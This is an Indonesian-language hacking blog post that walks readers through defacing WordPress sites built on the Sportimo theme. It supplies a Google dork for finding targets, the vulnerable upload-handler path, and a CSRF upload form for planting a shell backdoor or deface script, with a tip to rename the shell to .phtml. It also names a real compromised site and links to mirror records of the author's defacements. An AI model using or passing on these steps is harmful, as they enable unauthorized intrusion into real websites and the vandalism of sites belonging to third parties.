Pagi fans :* Please say hello haters :P
Kali ini gw mau ksaih Tutorial Deface Wordpress Themes Sportimo. Tutorial ini gak beda jauh sama tutorial sebelumnya :D
Baca: Tutorial Deface Wordpress Themes Radial.
Oke, sebelumnya kita siapin dulu bahan2 nya :D
Bahan:
1. Dork
inurl:/wp-content/themes/sportimo2. Exploit
/wp-content/themes/sportimo-theme/functions/upload-handler.phpcontoh
site.com/wp-content/themes/sportimo-theme/functions/upload-handler.php
3. Shell Backdoor atau Script Deface
Belum punya? Nih, Script Deface sederhana gw, COMOT.
4. CSRF
CSRF copy disini. Simpan dalam format .html
Langkah - Langkah:
1. Dorking ke google.
2. Pilih salah satu site.
3. Masukkan exploitnya.
4. Kalo vuln bakal ada tulisan 'error'. Contoh:
5. Copy link yg vuln, paste di CSRF.
6. Buka CSRF, pilih file yg mau diupload, klik SIKAT!
NB: Kalo mau upload shell, rename dulu jadi .phtml contoh: shell.phtml
7. Kalo file sukses ke upload, bakal keluar nama file lu.
8. Sekarang tinggal panggil file lu. Caranya?
/wp-content/uploads/tahun/bulan/namafilecontoh
http://kregle.net/wp-content/uploads/2017/01/o.phtml
Kalo masih bingung, bisa liat video tutorial gw di bawah :)
Ini hasil mirror an gw :
https://www.defacer.id/244106.html
https://1337mirror.com/12447.html
Oke, sekian tutorial gw kali ini, see u next post :*
Regards,
Berandal, [OWL SQUAD]